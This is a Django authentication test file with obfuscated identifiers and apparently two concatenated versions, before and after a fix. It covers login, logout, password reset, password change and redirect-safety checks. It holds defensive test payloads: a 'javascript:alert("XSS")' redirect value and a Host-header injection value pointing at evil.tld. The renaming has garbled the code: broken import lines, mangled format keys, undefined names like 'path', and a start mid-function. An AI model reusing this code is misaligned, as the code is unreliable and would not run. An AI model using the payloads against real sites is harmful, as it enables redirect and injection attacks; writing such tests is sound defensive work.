'username': 'testclient',
'password': VAR_2,
})
self.assertEqual(VAR_3.status_code, 302)
self.assertFalse(bad_url in VAR_3.url,
"%s should be blocked" % bad_url)
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/VAR_5%20with%20spaces/'): # see ticket #12534
VAR_31 = '%(VAR_5)s?%(next)s=%(good_url)s' % {
'url': VAR_17,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
VAR_3 = self.client.post(VAR_31, {
'username': 'testclient',
'password': VAR_2,
})
self.assertEqual(VAR_3.status_code, 302)
self.assertTrue(good_url in VAR_3.url,
"%s should be allowed" % good_url)
def FUNC_39(self):
self.client.post('/custom_requestauth_login/', {
'username': 'testclient',
'password': 'password',
}, follow=True)
def FUNC_40(self, VAR_2='password'):
VAR_18 = HttpRequest()
CsrfViewMiddleware().process_view(VAR_18, login_view, (), {})
VAR_18.META["CSRF_COOKIE_USED"] = True
VAR_19 = login_view(VAR_18)
VAR_20 = CsrfViewMiddleware().process_response(VAR_18, VAR_19)
VAR_21 = VAR_20.cookies.get(VAR_23.CSRF_COOKIE_NAME, None)
VAR_22 = VAR_21.coded_value
VAR_18 = HttpRequest()
VAR_18.COOKIES[VAR_23.CSRF_COOKIE_NAME] = VAR_22
VAR_18.method = "POST"
VAR_18.POST = {'username': 'testclient', 'password': VAR_2, 'csrfmiddlewaretoken': VAR_22}
VAR_18.REQUEST = VAR_18.POST
SessionMiddleware().process_request(VAR_18)
CsrfViewMiddleware().process_view(VAR_18, login_view, (), {})
VAR_18.META["SERVER_NAME"] = "testserver" # Required to have redirect work in FUNC_0 view
VAR_18.META["SERVER_PORT"] = 80
VAR_18.META["CSRF_COOKIE_USED"] = True
VAR_19 = login_view(VAR_18)
VAR_20 = CsrfViewMiddleware().process_response(VAR_18, VAR_19)
VAR_21 = VAR_20.cookies.get(VAR_23.CSRF_COOKIE_NAME, None)
VAR_24 = VAR_21.coded_value
self.assertNotEqual(VAR_22, VAR_24)
@skipIfCustomUser
class CLASS_6(CLASS_0):
def FUNC_41(self, VAR_5, VAR_7=False):
VAR_3 = self.client.get('/login_required/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, VAR_5, VAR_7=parse_qs)
@override_settings(LOGIN_URL='/FUNC_0/')
def FUNC_42(self):
self.assertLoginURLEquals('/FUNC_0/?next=/login_required/')
@override_settings(LOGIN_URL='login')
def FUNC_43(self):
self.assertLoginURLEquals('/FUNC_0/?next=/login_required/')
@override_settings(LOGIN_URL='http://remote.example.com/login')
def FUNC_44(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'http://remote.example.com/FUNC_0?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@override_settings(LOGIN_URL='https:///FUNC_0/')
def FUNC_45(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'https:///FUNC_0/?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@override_settings(LOGIN_URL='/FUNC_0/?pretty=1')
def FUNC_46(self):
self.assertLoginURLEquals('/FUNC_0/?pretty=1&next=/login_required/', VAR_7=True)
@override_settings(LOGIN_URL='http://remote.example.com/FUNC_0/?next=/default/')
def FUNC_47(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'http://remote.example.com/FUNC_0/?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@skipIfCustomUser
class CLASS_7(CLASS_0):
def FUNC_48(self, VAR_5):
VAR_3 = self.login()
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, VAR_5)
def FUNC_49(self):
self.assertLoginRedirectURLEqual('/accounts/profile/')
@override_settings(LOGIN_REDIRECT_URL='/custom/')
def FUNC_50(self):
self.assertLoginRedirectURLEqual('/custom/')
@override_settings(LOGIN_REDIRECT_URL='password_reset')
def FUNC_51(self):
self.assertLoginRedirectURLEqual('/password_reset/')
@override_settings(LOGIN_REDIRECT_URL='http://remote.example.com/welcome/')
def FUNC_52(self):
self.assertLoginRedirectURLEqual('http://remote.example.com/welcome/')
@skipIfCustomUser
class CLASS_8(CLASS_0):
def FUNC_53(self):
self.assertTrue(SESSION_KEY not in self.client.session)
self.login()
VAR_3 = self.client.get('/FUNC_1/')
self.assertContains(VAR_3, 'Logged out')
self.confirm_logged_out()
def FUNC_55(self):
self.login()
VAR_3 = self.client.get('/FUNC_1/')
self.assertTrue('site' in VAR_3.context)
def FUNC_56(self):
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
VAR_3 = self.client.get('/FUNC_1/next_page/?next=/FUNC_0/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/?next=/FUNC_0/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/custom_query/?follow=/somewhere/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/named/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
self.confirm_logged_out()
def FUNC_38(self, VAR_2='password'):
VAR_26 = reverse('logout')
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
VAR_30 = '%(VAR_5)s?%(next)s=%(bad_url)s' % {
'url': VAR_26,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
self.login()
VAR_3 = self.client.get(VAR_30)
self.assertEqual(VAR_3.status_code, 302)
self.assertFalse(bad_url in VAR_3.url,
"%s should be blocked" % bad_url)
self.confirm_logged_out()
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/VAR_5%20with%20spaces/'): # see ticket #12534
VAR_31 = '%(VAR_5)s?%(next)s=%(good_url)s' % {
'url': VAR_26,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
self.login()
VAR_3 = self.client.get(VAR_31)
self.assertEqual(VAR_3.status_code, 302)
self.assertTrue(good_url in VAR_3.url,
"%s should be allowed" % good_url)
self.confirm_logged_out()
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class CLASS_9(CLASS_0):
VAR_1 = 'django.contrib.auth.tests.urls_admin'
def FUNC_61(self):
User.objects.filter(username='testclient').update(is_staff=True, is_superuser=True)
self.login()
self.admin = User.objects.get(pk=1)
def FUNC_62(self, VAR_9):
return {
'username': VAR_9.username,
'password': VAR_9.password,
'email': VAR_9.email,
'is_active': VAR_9.is_active,
'is_staff': VAR_9.is_staff,
'is_superuser': VAR_9.is_superuser,
'last_login_0': VAR_9.last_login.strftime('%Y-%m-%d'),
'last_login_1': VAR_9.last_login.strftime('%H:%M:%S'),
'initial-last_login_0': VAR_9.last_login.strftime('%Y-%m-%d'),
'initial-last_login_1': VAR_9.last_login.strftime('%H:%M:%S'),
'date_joined_0': VAR_9.date_joined.strftime('%Y-%m-%d'),
'date_joined_1': VAR_9.date_joined.strftime('%H:%M:%S'),
'initial-date_joined_0': VAR_9.date_joined.strftime('%Y-%m-%d'),
'initial-date_joined_1': VAR_9.date_joined.strftime('%H:%M:%S'),
'first_name': VAR_9.first_name,
'last_name': VAR_9.last_name,
}
def FUNC_63(self):
with patch_logger('django.security.DisallowedModelAdminLookup', 'error') as logger_calls:
VAR_3 = self.client.get('/admin/auth/VAR_9/?password__startswith=sha1$')
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(logger_calls), 1)
def FUNC_64(self):
VAR_27 = self.get_user_data(self.admin)
VAR_27['email'] = 'new_' + VAR_27['email']
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/' % self.admin.pk, VAR_27)
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/')
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'Changed VAR_8.')
def FUNC_65(self):
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/' % self.admin.pk,
self.get_user_data(self.admin)
)
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/')
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'No VAR_11 changed.')
def FUNC_66(self):
VAR_3 = self.client.post('/admin/auth/VAR_9/%s/VAR_2/' % self.admin.pk, {
'password1': 'password1',
'password2': 'password1',
})
self.assertRedirects(VAR_3, '/admin/auth/VAR_9/%s/' % self.admin.pk)
VAR_28 = LogEntry.objects.latest('id')
self.assertEqual(VAR_28.change_message, 'Changed VAR_2.')
self.logout()
self.login(VAR_2='password1')
| import itertools
import os
import re
try:
from urllib.parse import .urlparse, ParseResult
except ImportError: # Python 2
from urlparse import .urlparse, ParseResult
from django.conf import global_settings, VAR_23
from django.contrib.sites.models import Site, RequestSite
from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import QueryDict, HttpRequest
from django.utils.encoding import force_text
from django.utils.http import .urlquote
from django.utils._os import .upath
from django.test import TestCase
from django.test.utils import override_settings, patch_logger
from django.middleware.csrf import CsrfViewMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import (AuthenticationForm, PasswordChangeForm,
SetPasswordForm)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.views import .login as login_view
@override_settings(
LANGUAGES=(
('en', 'English'),
),
LANGUAGE_CODE='en',
TEMPLATE_LOADERS=global_settings.TEMPLATE_LOADERS,
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(upath(__file__)), 'templates'),
),
USE_TZ=False,
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class CLASS_0(TestCase):
VAR_0 = ['authtestdata.json']
VAR_1 = 'django.contrib.auth.tests.urls'
def FUNC_0(self, VAR_2='password'):
VAR_3 = self.client.post('/FUNC_0/', {
'username': 'testclient',
'password': VAR_2,
})
self.assertTrue(SESSION_KEY in self.client.session)
return VAR_3
def FUNC_1(self):
VAR_3 = self.client.get('/admin/FUNC_1/')
self.assertEqual(VAR_3.status_code, 200)
self.assertTrue(SESSION_KEY not in self.client.session)
def FUNC_2(self, VAR_3, VAR_4):
VAR_10 = list(itertools.chain(*VAR_3.context['form'].errors.values()))
self.assertIn(force_text(VAR_4), VAR_10)
def FUNC_3(self, VAR_5, VAR_6, VAR_7=False):
VAR_11 = ParseResult._fields
for attr, VAR_32, VAR_33 in zip(VAR_11, urlparse(VAR_5), urlparse(VAR_6)):
if VAR_7 and attr == 'query':
VAR_32, VAR_33 = QueryDict(VAR_32), QueryDict(VAR_33)
if VAR_32 and VAR_33 and VAR_32 != VAR_33:
self.fail("%r != %r (%s doesn't match)" % (VAR_5, VAR_6, attr))
@skipIfCustomUser
class CLASS_1(CLASS_0):
VAR_1 = 'django.contrib.auth.urls'
VAR_12 = [
('login', [], {}),
('logout', [], {}),
('password_change', [], {}),
('password_change_done', [], {}),
('password_reset', [], {}),
('password_reset_done', [], {}),
('password_reset_confirm', [], {
'uidb64': 'aaaaaaa',
'token': '1111-aaaaa',
}),
('password_reset_complete', [], {}),
]
for name, args, kwargs in VAR_12:
try:
reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.fail("Reversal of VAR_5 named '%s' failed with NoReverseMatch" % name)
@skipIfCustomUser
class CLASS_2(CLASS_0):
def FUNC_5(self):
VAR_3 = self.client.get('/password_reset/')
self.assertEqual(VAR_3.status_code, 200)
VAR_3 = self.client.post('/password_reset/', {'email': 'not_a_real_email@VAR_8.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 0)
VAR_3 = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(VAR_23.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
self.assertFalse(mail.outbox[0].message().is_multipart())
def FUNC_7(self):
VAR_3 = self.client.post('/password_reset/html_email_template/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
VAR_13 = mail.outbox[0].message()
self.assertEqual(len(VAR_13.get_payload()), 2)
self.assertTrue(VAR_13.is_multipart())
self.assertEqual(VAR_13.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(VAR_13.get_payload(1).get_content_type(), 'text/html')
self.assertTrue('<html>' not in VAR_13.get_payload(0).get_payload())
self.assertTrue('<html>' in VAR_13.get_payload(1).get_payload())
VAR_3 = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
VAR_3 = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(VAR_23.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
VAR_3 = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
VAR_3 = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
def FUNC_12(self):
self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def FUNC_13(self, VAR_8):
VAR_14 = re.search(r"https?://[^/]*(/.*reset/\S*)", VAR_8.body)
self.assertTrue(VAR_14 is not None, "No URL found in sent email")
return VAR_14.group(), VAR_14.groups()[0]
def FUNC_14(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "Please enter your new password")
def FUNC_15(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path[:-5] + ("0" * 4) + VAR_15[-1]
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_16(self):
VAR_3 = self.client.get('/reset/123456/1-1/')
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_17(self):
VAR_3 = self.client.get('/reset/zzzzzzzzzzzzz/1-1/')
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_18(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path[:-5] + ("0" * 4) + VAR_15[-1]
self.client.post(VAR_15, {
'new_password1': 'anewpassword',
'new_password2': ' anewpassword',
})
VAR_16 = User.objects.get(VAR_8='staffmember@example.com')
self.assertTrue(not VAR_16.check_password("anewpassword"))
def FUNC_19(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
VAR_16 = User.objects.get(VAR_8='staffmember@example.com')
self.assertTrue(VAR_16.check_password("anewpassword"))
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_20(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'x'})
self.assertFormError(VAR_3, SetPasswordForm.error_messages['password_mismatch'])
def FUNC_21(self):
VAR_3 = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/done/')
def FUNC_22(self):
VAR_3 = self.client.post('/password_reset/custom_redirect/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_23(self):
VAR_3 = self.client.post('/password_reset/custom_redirect/named/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
def FUNC_24(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/reset/done/')
def FUNC_25(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path.replace('/reset/', '/reset/custom/')
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_26(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path.replace('/reset/', '/reset/custom/named/')
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CLASS_3(CLASS_0):
VAR_0 = ['custom_user.json']
def FUNC_12(self):
VAR_3 = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def FUNC_13(self, VAR_8):
VAR_14 = re.search(r"https?://[^/]*(/.*reset/\S*)", VAR_8.body)
self.assertTrue(VAR_14 is not None, "No URL found in sent email")
return VAR_14.group(), VAR_14.groups()[0]
def FUNC_27(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "Please enter your new password")
@skipIfCustomUser
class CLASS_4(CLASS_0):
def FUNC_28(self, VAR_2='password'):
VAR_3 = self.client.post('/FUNC_0/', {
'username': 'testclient',
'password': VAR_2,
})
self.assertFormError(VAR_3, AuthenticationForm.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})
def FUNC_1(self):
self.client.get('/FUNC_1/')
def FUNC_29(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertFormError(VAR_3, PasswordChangeForm.error_messages['password_incorrect'])
def FUNC_30(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
})
self.assertFormError(VAR_3, SetPasswordForm.error_messages['password_mismatch'])
def FUNC_31(self):
self.login()
self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.fail_login()
self.login(VAR_2='password1')
def FUNC_32(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_change/done/')
@override_settings(LOGIN_URL='/FUNC_0/')
def FUNC_33(self):
VAR_3 = self.client.get('/password_change/done/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/?next=/password_change/done/')
def FUNC_34(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_change/done/')
def FUNC_35(self):
self.login()
VAR_3 = self.client.post('/password_change/custom/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_36(self):
self.login()
VAR_3 = self.client.post('/password_change/custom/named/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
@skipIfCustomUser
class CLASS_5(CLASS_0):
def FUNC_37(self):
VAR_3 = self.client.get(reverse('login'))
self.assertEqual(VAR_3.status_code, 200)
if Site._meta.installed:
VAR_29 = Site.objects.get_current()
self.assertEqual(VAR_3.context['site'], VAR_29)
self.assertEqual(VAR_3.context['site_name'], VAR_29.name)
else:
self.assertIsInstance(VAR_3.context['site'], RequestSite)
self.assertTrue(isinstance(VAR_3.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def FUNC_38(self, VAR_2='password'):
VAR_17 = reverse('login')
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com',
'javascript:alert("XSS")'):
VAR_30 = '%(VAR_5)s?%(next)s=%(bad_url)s' % {
'url': VAR_17,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
VAR_3 = self.client.post(VAR_30, {
'username': 'testclient',
'password': VAR_2,
})
self.assertEqual(VAR_3.status_code, 302)
self.assertFalse(bad_url in VAR_3.url,
"%s should be blocked" % bad_url)
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'HTTPS:///',
'//testserver/',
'/VAR_5%20with%20spaces/'): # see ticket #12534
VAR_31 = '%(VAR_5)s?%(next)s=%(good_url)s' % {
'url': VAR_17,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
VAR_3 = self.client.post(VAR_31, {
'username': 'testclient',
'password': VAR_2,
})
self.assertEqual(VAR_3.status_code, 302)
self.assertTrue(good_url in VAR_3.url,
"%s should be allowed" % good_url)
def FUNC_39(self):
self.client.post('/custom_requestauth_login/', {
'username': 'testclient',
'password': 'password',
}, follow=True)
def FUNC_40(self, VAR_2='password'):
VAR_18 = HttpRequest()
CsrfViewMiddleware().process_view(VAR_18, login_view, (), {})
VAR_18.META["CSRF_COOKIE_USED"] = True
VAR_19 = login_view(VAR_18)
VAR_20 = CsrfViewMiddleware().process_response(VAR_18, VAR_19)
VAR_21 = VAR_20.cookies.get(VAR_23.CSRF_COOKIE_NAME, None)
VAR_22 = VAR_21.coded_value
VAR_18 = HttpRequest()
VAR_18.COOKIES[VAR_23.CSRF_COOKIE_NAME] = VAR_22
VAR_18.method = "POST"
VAR_18.POST = {'username': 'testclient', 'password': VAR_2, 'csrfmiddlewaretoken': VAR_22}
VAR_18.REQUEST = VAR_18.POST
SessionMiddleware().process_request(VAR_18)
CsrfViewMiddleware().process_view(VAR_18, login_view, (), {})
VAR_18.META["SERVER_NAME"] = "testserver" # Required to have redirect work in FUNC_0 view
VAR_18.META["SERVER_PORT"] = 80
VAR_18.META["CSRF_COOKIE_USED"] = True
VAR_19 = login_view(VAR_18)
VAR_20 = CsrfViewMiddleware().process_response(VAR_18, VAR_19)
VAR_21 = VAR_20.cookies.get(VAR_23.CSRF_COOKIE_NAME, None)
VAR_24 = VAR_21.coded_value
self.assertNotEqual(VAR_22, VAR_24)
@skipIfCustomUser
class CLASS_6(CLASS_0):
def FUNC_41(self, VAR_5, VAR_7=False):
VAR_3 = self.client.get('/login_required/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, VAR_5, VAR_7=parse_qs)
@override_settings(LOGIN_URL='/FUNC_0/')
def FUNC_42(self):
self.assertLoginURLEquals('/FUNC_0/?next=/login_required/')
@override_settings(LOGIN_URL='login')
def FUNC_43(self):
self.assertLoginURLEquals('/FUNC_0/?next=/login_required/')
@override_settings(LOGIN_URL='http://remote.example.com/login')
def FUNC_44(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'http://remote.example.com/FUNC_0?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@override_settings(LOGIN_URL='https:///FUNC_0/')
def FUNC_45(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'https:///FUNC_0/?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@override_settings(LOGIN_URL='/FUNC_0/?pretty=1')
def FUNC_46(self):
self.assertLoginURLEquals('/FUNC_0/?pretty=1&next=/login_required/', VAR_7=True)
@override_settings(LOGIN_URL='http://remote.example.com/FUNC_0/?next=/default/')
def FUNC_47(self):
VAR_25 = urlquote('http://testserver/login_required/')
VAR_6 = 'http://remote.example.com/FUNC_0/?next=%s' % VAR_25
self.assertLoginURLEquals(VAR_6)
@skipIfCustomUser
class CLASS_7(CLASS_0):
def FUNC_48(self, VAR_5):
VAR_3 = self.login()
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, VAR_5)
def FUNC_49(self):
self.assertLoginRedirectURLEqual('/accounts/profile/')
@override_settings(LOGIN_REDIRECT_URL='/custom/')
def FUNC_50(self):
self.assertLoginRedirectURLEqual('/custom/')
@override_settings(LOGIN_REDIRECT_URL='password_reset')
def FUNC_51(self):
self.assertLoginRedirectURLEqual('/password_reset/')
@override_settings(LOGIN_REDIRECT_URL='http://remote.example.com/welcome/')
def FUNC_52(self):
self.assertLoginRedirectURLEqual('http://remote.example.com/welcome/')
@skipIfCustomUser
class CLASS_8(CLASS_0):
def FUNC_53(self):
self.assertTrue(SESSION_KEY not in self.client.session)
self.login()
VAR_3 = self.client.get('/FUNC_1/')
self.assertContains(VAR_3, 'Logged out')
self.confirm_logged_out()
def FUNC_55(self):
self.login()
VAR_3 = self.client.get('/FUNC_1/')
self.assertTrue('site' in VAR_3.context)
def FUNC_56(self):
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
VAR_3 = self.client.get('/FUNC_1/next_page/?next=/FUNC_0/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/?next=/FUNC_0/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/custom_query/?follow=/somewhere/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/somewhere/')
self.confirm_logged_out()
self.login()
VAR_3 = self.client.get('/FUNC_1/next_page/named/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
self.confirm_logged_out()
def FUNC_38(self, VAR_2='password'):
VAR_26 = reverse('logout')
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com',
'javascript:alert("XSS")'):
VAR_30 = '%(VAR_5)s?%(next)s=%(bad_url)s' % {
'url': VAR_26,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
self.login()
VAR_3 = self.client.get(VAR_30)
self.assertEqual(VAR_3.status_code, 302)
self.assertFalse(bad_url in VAR_3.url,
"%s should be blocked" % bad_url)
self.confirm_logged_out()
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'HTTPS:///',
'//testserver/',
'/VAR_5%20with%20spaces/'): # see ticket #12534
VAR_31 = '%(VAR_5)s?%(next)s=%(good_url)s' % {
'url': VAR_26,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
self.login()
VAR_3 = self.client.get(VAR_31)
self.assertEqual(VAR_3.status_code, 302)
self.assertTrue(good_url in VAR_3.url,
"%s should be allowed" % good_url)
self.confirm_logged_out()
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class CLASS_9(CLASS_0):
VAR_1 = 'django.contrib.auth.tests.urls_admin'
def FUNC_61(self):
User.objects.filter(username='testclient').update(is_staff=True, is_superuser=True)
self.login()
self.admin = User.objects.get(pk=1)
def FUNC_62(self, VAR_9):
return {
'username': VAR_9.username,
'password': VAR_9.password,
'email': VAR_9.email,
'is_active': VAR_9.is_active,
'is_staff': VAR_9.is_staff,
'is_superuser': VAR_9.is_superuser,
'last_login_0': VAR_9.last_login.strftime('%Y-%m-%d'),
'last_login_1': VAR_9.last_login.strftime('%H:%M:%S'),
'initial-last_login_0': VAR_9.last_login.strftime('%Y-%m-%d'),
'initial-last_login_1': VAR_9.last_login.strftime('%H:%M:%S'),
'date_joined_0': VAR_9.date_joined.strftime('%Y-%m-%d'),
